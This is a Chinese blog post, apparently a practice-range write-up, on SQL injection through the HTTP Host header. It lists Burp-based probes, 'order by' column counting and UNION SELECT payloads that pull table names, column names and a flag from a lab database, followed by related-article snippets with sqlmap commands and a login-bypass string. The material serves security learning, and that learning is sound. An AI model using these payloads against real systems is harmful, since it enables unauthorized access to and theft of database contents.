SQL注入漏洞测试(HTTP头注入)

最新推荐文章于 2024-08-25 21:18:14 发布
最新推荐文章于 2024-08-25 21:18:14 发布
阅读量2k 收藏 7
点赞数 2
分类专栏: 靶场练习思路 文章标签: 靶场 SQL injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43370360/article/details/94380371
版权

SQL注入漏洞测试(HTTP头注入)

你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。

新的改变

用burp抓包进入send to repeater 根据标题所示注入在http头:User-AgentcookieX_FORWARDED_FOR这三块地方

这题的注入点在host:
在host插入单引号,接着 and 1=1,and 1=2.
在host插入单引号,接着 and 1=1,and 1=2.

在这里插入图片描述在这里插入图片描述
证明有注入点,接着查字段 order by 5查看

在这里插入图片描述
发现报错,这时候我们的五减一,换成order by 4 #回显了证明字段数位四
在这里插入图片描述
我们知道字段是四个后,接着我们用union 查询我们要的内容
payload:

	Union select 1,database(),3,4 #(这里detabase(),换为user(),@@version)

在这里插入图片描述显示了数据库名为:pentesterlab,现在我们就构造下一句
payload:

	union select 1,table_name,3,4 from information_schema.tables where table_schema=0x70656E7465737465726C6162#

在这里插入图片描述
查询出表名:comment,Flag,goods,user。然而我们需要的flag表的内容。
payload:

union select 1,column_name,3,4 from information_schema.columns where table_schema=0x70656E7465737465726C6162 and table_name=0x666C6167#

在这里插入图片描述

显示列名:id,flag
接下来我们直接查询flag列的数据
Payload:

union select 1,group_concat(flag),3,4 from flag#

在这里插入图片描述
注明:本文只是做题的一点点的思路希望能有所帮助!

ID:lolong
关注
专栏目录
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 357
通常 Sql 注入漏洞分为 2 种类型:数字型,字符型。数字型判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符型还是整型都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
SQL注入漏洞测试(布尔盲注)
qq_52718293的博客
11-30 5333
一.sqlmap 1.查看库名(测试后发现有5个) python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 --dbs 2.查看表明 python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 -D stormgroup --tables 3.查看字段名 python sqlmap.py -u http://219.153.49.228:44485/new_
Web安全:SQL注入实战测试.(扫描 + 测试
最新发布
网络安全领域___专研者.
08-25 1273
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
SQL注入漏洞测试(参数加密)
硫酸超的博客
07-23 934
SQL注入漏洞测试背景介绍实训目标解题方向实验步骤 背景介绍 此WEB业务环境对参数进行了AES加密,为了防止参数产生SQL注入,也是防止SQL注入产生的一种方法,但是这种方式就安全了么? 实训目标 1、掌握信息泄露的方式; 2、了解AES加解密; 3、了解PHP的基本语法; 4、掌握手工SQL注入; 5、了解MySQL数据库的结构; 解题方向 通过SQL注入方式,获取WEB业务系统的账号密码进行登录。 实验步骤 1、通过观察网页,发现登录按钮下面的公告可以点进去 2、进入之后发现URL后面的参数为一连串
SQL注入漏洞全接触.ppt
11-15
* 可以使用单引号测试法来检测SQL注入漏洞,但是这种方法不一定准确。 五、 SQL注入漏洞的防御方法 * 对用户输入数据的合法性进行判断,以防止SQL注入漏洞。 * 使用参数化查询来防止SQL注入漏洞。 * 及时更新和...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本...总的来说,这个主题涉及到的是网络安全中的一个重要环节——SQL注入漏洞的检测和防范,以及如何利用POC脚本进行渗透测试,以提升Web应用的安全性。
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入是网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
SQL漏洞测试平台
11-19
SQL漏洞测试平台,安装WAMP,然后项目部署在WAMP_HOME\apache2\htdocs下,即可。可作为SQL注入漏洞的入门平台
mysql 注入测试_SQL注入之DVWA平台测试mysql注入
weixin_30395665的博客
01-19 304
今天主要针对mysql常用注入语句进行测试测试环境与工具:测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103首先我们介绍下DVWA和Burpsuite,D...
SQL注入漏洞的检测及防御方法
leyang0910的博客
12-07 659
SQL注入是一种攻击技术,攻击者通过在输入字段中插入恶意SQL代码,试图欺骗应用程序以执行不安全的数据库操作。这些恶意SQL代码将与应用程序的数据库进行交互,允许攻击者执行未授权的操作。SQL注入攻击通常针对使用动态SQL查询的Web应用程序,这些查询构建在未正确过滤或验证用户输入的基础上。SQL注入攻击通常涉及使用单引号、双引号、注释符号和逻辑运算符等特殊字符,以绕过应用程序的输入验证,构造恶意SQL查询。成功的攻击可能导致数据库泄漏、数据破坏、未授权访问、甚至完整的数据库服务器控制。
SQL注入漏洞测试(布尔盲注)
qq_45883601的博客
12-06 328
使用Sqlmap工具注入 1、首先获取数据库名 Python sqlmap.py -u"http://219.153.49.228:49953/new_list.php?id=1" --current-db 2、
漏洞检测~SQL注入
北风
12-06 8146
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/78734503 漏洞成因: SQL注入主要存在于动态网站的web应用中,攻击者将恶意的sql语句插入到表单的输入域或网页请求的字符串中,提交给web服务器,如果应用程序没有对用户的输入进行检查和过滤,则会执行恶意的SQL语句,即SQL注入产生。 简而言之:SQL注入由于应...
安全测试--注入攻击实验
Qton_CSDN的博客
02-27 816
步骤1:正确密码登录,安全级别改为low,用户名为 admin ,密码为password登录。显示登录成功。 步骤1-2:正确用户名,错误密码1 登录。显示登录失败。   步骤1-3:找到low.php文件并修改安全代码。     步骤1-4:用户名 ‘OR1=1 OR ‘1’=’1  密码为空登录,显示登录成功。 步骤1-5:用户名 admin’#密码为空登...
SQL注入-12】http注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2622
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
http注入
姜小孩的博客
10-23 356
原理 有些时候,后台开发人员为了验证客户端信息(比如常用的cookie验证),或者通过http header信息获取客户端的一些资料,比如useragent、accept字段等。会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的sql inject漏洞。 适用场景: 网站会读取用户的一些信息 使用: sql-labs第十八关,发现她会抓取我们的ip,那么我们就可以用burp抓包,将代理模块的http历史记录中抓
SQL注入漏洞测试入门指南
SQL注入漏洞测试入门篇 SQL注入漏洞测试是一种常见的Web应用安全漏洞,通过对用户输入数据的合法性判断不当,攻击者可以 inject恶意 SQL 代码,获取敏感数据或控制服务器。以下是 SQL 注入漏洞测试的相关知识点: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值